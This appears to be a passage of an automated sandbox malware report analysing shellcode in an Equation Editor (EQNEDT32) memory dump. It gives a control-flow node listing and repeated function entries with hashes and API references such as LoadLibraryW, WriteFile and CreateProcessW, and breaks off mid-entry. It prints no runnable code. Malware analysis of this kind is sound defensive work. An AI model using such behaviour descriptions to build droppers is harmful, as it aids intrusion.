call 35903af 1518->1525 1519->1490 1527 359049e-35904a0 1520->1527 1528 3590504-3590505 1520->1528 1526 359042a-3590470 call 359044e 1521->1526 1521->1527 1542 359050b 1523->1542 1550 3590497 1523->1550 1548 35904bd 1524->1548 1549 3590526-359054d WriteFile 1524->1549 1525->1512 1551 35904e8 1526->1551 1552 3590473 1526->1552 1533 35904a3-35904a5 1527->1533 1534 3590507 1528->1534 1540 359050c-3590518 1533->1540 1541 35904a7-35904ab 1533->1541 1534->1542 1553 359051a-359051f 1540->1553 1554 359054f-3590561 call 3590563 1540->1554 1541->1524 1542->1540 1555 35904bf-35904c8 1548->1555 1556 3590524 1548->1556 1549->1534 1557 3590499 1550->1557 1558 35904eb-35904ff call 3590502 1550->1558 1559 35904ea 1551->1559 1552->1559 1560 3590476-359049d call 35904a8 1552->1560 1553->1549 1561 3590521 1553->1561 1574 3590565-3590574 call 3590580 1554->1574 1556->1549 1557->1520 1571 3590501 1558->1571 1572 3590562 1558->1572 1559->1558 1560->1528 1576 359049f-35904a0 1560->1576 1561->1549 1571->1528 1572->1574 1581 35905d7-35905db 1574->1581 1582 3590576 1574->1582 1576->1533 1583 35905dd-35905e2 ExitProcess 1581->1583 1584 3590578 1582->1584 1585 35905ec-35905ef 1582->1585 1587 35905ea 1584->1587 1588 359057a-3590593 call 35905a1 1584->1588 1586 35905f2-35905f4 1585->1586 1590 35905f7-3590603 call 359060c 1586->1590 1587->1585 1597 35905fa-35905fc call 359060c 1588->1597 1598 3590595-3590596 1588->1598 1590->1586 1595 3590605-3590609 1590->1595 1601 35905fd-3590603 1597->1601 1600 3590598-3590599 1598->1600 1598->1601 1602 359059b-359059e 1600->1602 1603 359060a 1600->1603 1601->1586 1601->1595 1602->1590 1604 35905a0-35905d4 CreateProcessW call 35905dd 1602->1604 1608 3590626 1604->1608 1609 35905d6 1604->1609 1612 3590628-359062c 1608->1612 1613 359062e-3590632 1608->1613 1610 35905d8-35905db 1609->1610 1611 3590647-3590649 1609->1611 1610->1583 1616 3590659-359065a 1611->1616 1612->1613 1614 359063a-3590641 1612->1614 1613->1611 1615 3590634-3590638 1613->1615 1617 3590643 1614->1617 1618 3590645 1614->1618 1615->1611 1615->1614 1617->1611 1619 359064b-3590654 1618->1619 1621 359061d-3590620 1619->1621 1622 3590656 1619->1622 1621->1619 1623 3590622 1621->1623 1622->1616 1623->1608
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: acfa80daeba94050e1de8608a8266b282a85768ad6ee74b4ce4577969f5755a6
                                          • Instruction ID: 930af8d2f761e7c62b9ef89d28a0940016e0e4ae8ee6d21ebe3f53fecfc13c32
                                          • Opcode Fuzzy Hash: acfa80daeba94050e1de8608a8266b282a85768ad6ee74b4ce4577969f5755a6
                                          • Instruction Fuzzy Hash: 7041BD6540D7C08FFF11DA607E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900A1 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 649e7a15633f4f10f5ba12daf6af4e744826f324c769b2532a6e37fb9c6b7ab3
                                          • Instruction ID: e3f57dc06ac6349629015dcc8768b46289ccc8602a2490951c919d9f970d08b8
                                          • Opcode Fuzzy Hash: 649e7a15633f4f10f5ba12daf6af4e744826f324c769b2532a6e37fb9c6b7ab3
                                          • Instruction Fuzzy Hash: D941AC6540D3C08FFF11D6207E9A665BFA4BB07600F4E8EDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900DA Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: e6e8548bcab6edb1107d54827f7a615732fc8966f76e471011d4f9d5f63d8f6d
                                          • Instruction ID: d380cf2f11568b7c4807ae9e7e827971bfc8f1477372b00396a4bbb744b17fa6
                                          • Opcode Fuzzy Hash: e6e8548bcab6edb1107d54827f7a615732fc8966f76e471011d4f9d5f63d8f6d
                                          • Instruction Fuzzy Hash: 1341BD6540D3C08FFF11D6607E9A665BF64BB07600F4D8DDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0359008E Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 3496ffe8af0ac140084e12d844f511c1fd9efc793bbe1b1c7c620673a3c7437e
                                          • Instruction ID: e0d96a2b4e32e90660900f401247d9c75e2ced32ce587e3b10bec37551c8bb84
                                          • Opcode Fuzzy Hash: 3496ffe8af0ac140084e12d844f511c1fd9efc793bbe1b1c7c620673a3c7437e
                                          • Instruction Fuzzy Hash: FD41BD6540D3C08FFF11D6607E9A665BF64BB07600F4D8DDB85824F0F3D294924AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900D4 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 6cb95ba97b179244f8e338a3df6daf6f8434967f7e2830d87b26c29a4736d7c8
                                          • Instruction ID: e4e00f39ba3ab8b2b4ffad8c11264fcfad6e62a8b7f43fd1a1977f54791143c8
                                          • Opcode Fuzzy Hash: 6cb95ba97b179244f8e338a3df6daf6f8434967f7e2830d87b26c29a4736d7c8
                                          • Instruction Fuzzy Hash: 4741CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0359009F Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 90e07c19572a4093e8df1e130215d4e5336916121f95f59d79cb96360901a8ab
                                          • Instruction ID: a8911cc4ce47d41a362e1e57e5c86a23894e3f67f82988c0956d231be04d1247
                                          • Opcode Fuzzy Hash: 90e07c19572a4093e8df1e130215d4e5336916121f95f59d79cb96360901a8ab
                                          • Instruction Fuzzy Hash: D641CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8EDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590094 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: c657b6e9f4091d1da4aa1c6035261f50145361ddf97d506de7459008a47ef813
                                          • Instruction ID: f4f7ef80dadab465d737b36a4345e5eacb0cf5099b123e778c3dcd18abb16415
                                          • Opcode Fuzzy Hash: c657b6e9f4091d1da4aa1c6035261f50145361ddf97d506de7459008a47ef813
                                          • Instruction Fuzzy Hash: D141CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590107 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: e638b376a4487c6a456ac93ce7437f9ab05b91c7dc568658768a8336c8d4ef95
                                          • Instruction ID: 00d3b0db23017e55b1816f423c2d2b83f7cec9d2c6e4eb560329ebdd7cc0c8d8
                                          • Opcode Fuzzy Hash: e638b376a4487c6a456ac93ce7437f9ab05b91c7dc568658768a8336c8d4ef95
                                          • Instruction Fuzzy Hash: 6441CC6540D3C08FFF12D6207E9A665BFA4BB07600F4D8DDB85824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900B2 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 59186500a37ffdea3106a67061b4928d13116d92195edc25f051790e969310fe
                                          • Instruction ID: 735ae54b85f1d9fb5f00725b90f251d1cb3a6fda3cda7e5095df7b6ca41178e7
                                          • Opcode Fuzzy Hash: 59186500a37ffdea3106a67061b4928d13116d92195edc25f051790e969310fe
                                          • Instruction Fuzzy Hash: B731BF6580D3C19FFF12D6606E9A665BF64BB07600F5D8ECBC5824F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0359007F Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 212ef4689f40aa0bdb2ca3633087669991d14be32b53d127883c670fa1975699
                                          • Instruction ID: 7043e066b1b45c99cc660e3fd4e0898490a6879a1037c653b567d7bf63fd6507
                                          • Opcode Fuzzy Hash: 212ef4689f40aa0bdb2ca3633087669991d14be32b53d127883c670fa1975699
                                          • Instruction Fuzzy Hash: 9E31B06580D7C19FFB12D6606E9A655BF64BB07600F1D8ECB85814F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900FA Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 9f935678533a7fc563786887b11b06fae92a430cedc7808c7377b26c17a0e726
                                          • Instruction ID: dbfe2595f57b0755fb5ee6266c551a154e30cb59d7409b5fe33f4bc09fc91217
                                          • Opcode Fuzzy Hash: 9f935678533a7fc563786887b11b06fae92a430cedc7808c7377b26c17a0e726
                                          • Instruction Fuzzy Hash: 1C31CE6580D3C09FFB12D6206E9A665BF64BB47600F1D8DCBC5C24F1F3D295A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035903AF Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 1b4b9441acc08caf761ef301c24d4a30e1d5ca95ee8f11c21f17188573157e1c
                                          • Instruction ID: 2b538192b9a0f69273c90754b10529df227546ac861e270fffa4e50b9760d756
                                          • Opcode Fuzzy Hash: 1b4b9441acc08caf761ef301c24d4a30e1d5ca95ee8f11c21f17188573157e1c
                                          • Instruction Fuzzy Hash: 7C31AD2044D3C16EEB12E7749D5AB29BF74BF83600F2849CFE1850F1F3E6555605D226
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590101 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 0ae92c29ef0a25f1bf9087bc24aa28e788412c4fd332ae4b4e819cc3fd7ef51e
                                          • Instruction ID: 52685983ec44e0c95444c539aa6de855cca76404b35a8147ceccbc59460cc405
                                          • Opcode Fuzzy Hash: 0ae92c29ef0a25f1bf9087bc24aa28e788412c4fd332ae4b4e819cc3fd7ef51e
                                          • Instruction Fuzzy Hash: 9D31DF6580D3C09FFB12D6206E9A665BF64BB07600F1D8DCBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590123 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 55acb1b902b0c2166eea14e2029fc259b18eef6c303f7bb2acbecb7e59dedaa2
                                          • Instruction ID: 7b0fc199e259731e4ea5e034d0331676001c626d6133840e8e5ea4ea9a66e780
                                          • Opcode Fuzzy Hash: 55acb1b902b0c2166eea14e2029fc259b18eef6c303f7bb2acbecb7e59dedaa2
                                          • Instruction Fuzzy Hash: EB31DF6580D7C09FFB12D6206E9A665BF64BB07600F1D8DCBC5C14F0F3D295A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900DD Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: ef6f9140ac6238ac56ed7b6ac70911d04ca3142cb48f054132b6858b10d7b247
                                          • Instruction ID: 248cb8675d5dc7a3c88337d4db3de740c7be1e08b4fbc703a52faecbd1beae5b
                                          • Opcode Fuzzy Hash: ef6f9140ac6238ac56ed7b6ac70911d04ca3142cb48f054132b6858b10d7b247
                                          • Instruction Fuzzy Hash: 8231DF6580D3C09FFB12D6206E9A664BF64BB07600F1D8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900D6 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 199e981767e0aee37e3fe7ccecb914fa137e76f32f63c26eb680ad58761b6a19
                                          • Instruction ID: c4939bfccbcbebef59e7b6f89b6cdc1336d573317d79b371b5cdcc84b5287986
                                          • Opcode Fuzzy Hash: 199e981767e0aee37e3fe7ccecb914fa137e76f32f63c26eb680ad58761b6a19
                                          • Instruction Fuzzy Hash: FD31DF6580D3C09FFB12D6206E9A664BF64BB07600F1D8DCBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900B4 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: b5ebf514a3d50d5c65955edf55e34017b02ac87603f3386316b87d23451cc866
                                          • Instruction ID: 25d42e1b3f781b3b258fe31878f34ea5df2d797d33b419e896dbcb57790cfa38
                                          • Opcode Fuzzy Hash: b5ebf514a3d50d5c65955edf55e34017b02ac87603f3386316b87d23451cc866
                                          • Instruction Fuzzy Hash: F131E06580D3C09FFB12D6206E9A664BF64BB07600F1D8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590092 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 0ed5f57f1a058cad450d11ad69cd670b5e552a24301b11f5cb68ad49e90c367e
                                          • Instruction ID: 42dba688c80a67fb9f66016fc2d2d9b24a9695a981596428eb66cb2f07b7a2fc
                                          • Opcode Fuzzy Hash: 0ed5f57f1a058cad450d11ad69cd670b5e552a24301b11f5cb68ad49e90c367e
                                          • Instruction Fuzzy Hash: 5C31CE6140D7C09FFB12D6606E6A664BF64BB47600F1D8ECBC5C18F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590089 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 6fc1aee10ef0beeb26e6830feceba3cc663a012cc8923075439bfe3be43ae505
                                          • Instruction ID: 9fa9a679714fc62e22f2116ae964d90dfa717d8d9b1a63b29e4c7c64e3173fba
                                          • Opcode Fuzzy Hash: 6fc1aee10ef0beeb26e6830feceba3cc663a012cc8923075439bfe3be43ae505
                                          • Instruction Fuzzy Hash: B031CE6140D7C09FFB12D6606E5A654BF64BB47600F1C8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035900B6 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: 390481a77dce610bdc78fdc9070a67b85d40d85b7fd72e0738d4425a05b579cb
                                          • Instruction ID: b0d6b62efb10d4cc1f12b5a84c9f83a5dd743bc10a2f8526b6005bc1eee8e2e4
                                          • Opcode Fuzzy Hash: 390481a77dce610bdc78fdc9070a67b85d40d85b7fd72e0738d4425a05b579cb
                                          • Instruction Fuzzy Hash: 9931CE6140D7C09FFB12D6606E6A664BF64BB47600F1D8ECBC5C14F0F3D294A24AA353
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590071 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: e1f3b97d9b5a4b1bf2b4b4a8a0256526f0700a2ca264c020793356f696cb1b82
                                          • Instruction ID: 1afe0ff8adbbd95869816f8bf1da211f904f92f2c64902c226fc1e7bf2a22288
                                          • Opcode Fuzzy Hash: e1f3b97d9b5a4b1bf2b4b4a8a0256526f0700a2ca264c020793356f696cb1b82
                                          • Instruction Fuzzy Hash: 1D31BA6180D7C05FEB12D6606E9A654BFA4BB47600F1C8ECBC5C18F1F3D295A24AA363
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590075 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateExitFileProcess
                                          • String ID:
                                          • API String ID: 2838702978-0
                                          • Opcode ID: abce51639879b1add4e184ed6421d2e3f0526ae8d7c41856b8e6acfdaa59c4eb
                                          • Instruction ID: bf4fe2c5897293687d27742984d00135495dbc048170354c5a47fb2db2a67e06
                                          • Opcode Fuzzy Hash: abce51639879b1add4e184ed6421d2e3f0526ae8d7c41856b8e6acfdaa59c4eb
                                          • Instruction Fuzzy Hash: 9A31CB6180D7C05FEB12D7606E9A654BFA4BB47600F1C8ACBC5C18F1F3D295A24AA362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590098 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eaac63aff88d3c417234ed25a3e1838bd2e4566b77137129547aeefebf4bda82
                                          • Instruction ID: 984ac3f7b70664e614b27d382451b1bd0affcbf3bab17b8fc82311c1621a91fb
                                          • Opcode Fuzzy Hash: eaac63aff88d3c417234ed25a3e1838bd2e4566b77137129547aeefebf4bda82
                                          • Instruction Fuzzy Hash: 5F31EE6180D7C05FEB12D7606E9A654BFB4BF47600F1C8ACBC5C18F0F3D294A24AA362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590113 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b17d2fad3d765ad7a786674fa01c2ee303013370c0b64e93081400e756861086
                                          • Instruction ID: 984ac3f7b70664e614b27d382451b1bd0affcbf3bab17b8fc82311c1621a91fb
                                          • Opcode Fuzzy Hash: b17d2fad3d765ad7a786674fa01c2ee303013370c0b64e93081400e756861086
                                          • Instruction Fuzzy Hash: 5F31EE6180D7C05FEB12D7606E9A654BFB4BF47600F1C8ACBC5C18F0F3D294A24AA362
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0359045B Relevance: 1.6, APIs: 1, Instructions: 84fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
                                          • Instruction ID: 78443260761a63aaadae894342f79e7f19bab4046f039b3aa804836c33100d07
                                          • Opcode Fuzzy Hash: d4d463e9b9c9ed4a6d9070107b554e4f8b46087707d5ad8be43035a7d0fae483
                                          • Instruction Fuzzy Hash: BB2183B1408386AAEF11EB54ED41E6FBBB9FFC1B00F148D4EB185460B2E671D6088665
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035902E9 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2cbc8d8d16dec18aa5c0f836d39b11ca0171ac973cc76324eeeff81c0030aeae
                                          • Instruction ID: 986c30f45316d04bbd114ed316d3e06d1d565fe5d12f5628a00b517eb555a4d9
                                          • Opcode Fuzzy Hash: 2cbc8d8d16dec18aa5c0f836d39b11ca0171ac973cc76324eeeff81c0030aeae
                                          • Instruction Fuzzy Hash: 5E21BA6544D7C15FFB21D7702D9AB55BEA4BB8A600F1D8ECB81C18F1F3D298A10A9316
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590305 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 9558ff419d245c8c08bfc850e0b888f05bf2b329ec43985635aef6d0d55f1aff
                                          • Instruction ID: 172df861c447ddf52dcfe2784370bf1248c20eae3f2d2fd0e0d4b89d653e1daf
                                          • Opcode Fuzzy Hash: 9558ff419d245c8c08bfc850e0b888f05bf2b329ec43985635aef6d0d55f1aff
                                          • Instruction Fuzzy Hash: 0411EEA544C7C14FFB21D6302D9AB84BE60BB8A600F0D8ECB95C58F1F3D294A10A9352
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590477 Relevance: 1.6, APIs: 1, Instructions: 64processfileCOMMON
                                          Download Yara Rule
                                          APIs
